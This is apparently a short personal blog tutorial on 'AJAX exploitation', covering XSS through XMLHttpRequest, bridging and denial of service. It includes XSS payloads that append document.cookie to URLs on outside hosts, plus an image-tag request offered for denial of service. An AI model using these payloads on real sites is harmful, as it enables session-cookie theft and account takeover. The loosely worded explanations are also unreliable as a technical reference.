AJaX ExplOitatioN






Asalamu alailkum I am Malik Ubi and Today we will discuss about AJAX EXPLOITATION 

So what is it and How can we perform it  follow me and Lets play the game 

.:AJAX  Exploitation :. 

Asynchronous  JavaScript  and  XML  (AJAX)  is  one  of  the  latest  technologies  used  by  Web developers  to  provide  a  browsing  experience  like  working  on  "local.  "  As  a  new  technique  there are  still  some  security  features  that  haven't  been  studied  yet:-  There  are  more  -inputs-  so,  there  are  more  “points”  to  protect.-  Internal  functions  are  exposed.-  Contains  no  well-defined  coding  mechanisms  when  a  client  accesses  to  resources.-  Not  very  efficient  protecting  the  session  and  authentication  credentials. 

Vulnerabilities  in  XMLHTTPRequest  object:

 AJAX  uses  XMLHTTPRequest  to  handle  all  communication  with  the  server  application.  When  a client  sends  a  request  to  a  specific  URL  on  the  same  server  that  contains  the  original  page,  can receive  different  responses.  It  is  very  useful  to  give  some  "capacity"  to  users  within  a  web application.  In  addition  XMLHTTPRequest  can  collect  information  from  virtually  all  servers  in the  web,  allowing  to  open  different  attack  vectors  and  techniques  through  use  (SQL  Injections, XSS...)

XSS  vulnerabilities  using  Ajax:

 AJAX  requests  and  operation  of  the  browser  are  similar.  Therefore,  the  server  cannot differentiate  them.  That  means  that  cannot  know  what  requests  are  in  the  "background."  For example,  a  program  writted  in  -javascript-  can  use  AJAX  to  request  a  resource  that  is  in  the background  without  the  user  noticing.  The  browser  will  automatically  add  everything  you  need for  authentication  or  to  send  more  requests,  if  necessary. This  type  of  expansion  greatly  increases  the  possibility  of  XSS  attack vector. Through  AJAX,  an  attacker  can  launch  different  injections  on  specific  pages  to  which  the  user  is viewing.  A  XSS  vector  can  use  AJAX  requests  to  inject  himself  in  a  very  simple,  and  re-inject more  vectors.  Something  like  a  virus,  and  also  without  having  to  "refresh"  the  web.

Example  of  “invisible”  propagation  through  multiple  HTTP  requests: <script>alert("SCG09")</script> <script>document.location='http://tiendavirtual.com/pagina1.pl?'%20+document.cookie</script> Injected  code: http://tiendavirtual.com/login.php? variable="><script>document.location='http://ejemplo2.com/foro.php?'+document.cookie</script> 

The  code  will  redirect  the  page  to  an  external  site,  which  in  turn  contains  another  page  with malicious  code  just  after  the  user  is  "logged"  in  the  original  page  from  which  the  request  was maded. 

Ajax  Bridging: For  security  measures,  AJAX  applications  only  allows  to  connect  from  the  website  from  which they  come.  That  means  that  -javascript-  with  Ajax  downloading  from  web  A,  cannot  realize connections  to  web  B  (externaly  at  first).  For  allow  it,  is  used  some  “bridge”  services.  The “bridge”  works  like  proxy  with  the  webserver,  forwarding  traffic  between  the  -javascript-  of  the client  side  and  the  external  web.  Is  like  a  web  service,  for  the  own  website.  An  attacker  can  use this  “feature”  to  access  to  restricted  areas.

 Denegation  of  service  with  AJAX: 

<IMG  SRC="http://tiendavirtual.com/cgi-bin/scriptx.cgi?a=b">

So as you see this was a basic Explanation of AJax Exploitation that i know, Learneδ and also shared with you
I hope u liked it :-D 
#Mαℓïк_Цвï
Post A Comment
  • Blogger Comment using Blogger
  • Facebook Comment using Facebook
  • Disqus Comment using Disqus

2 comments :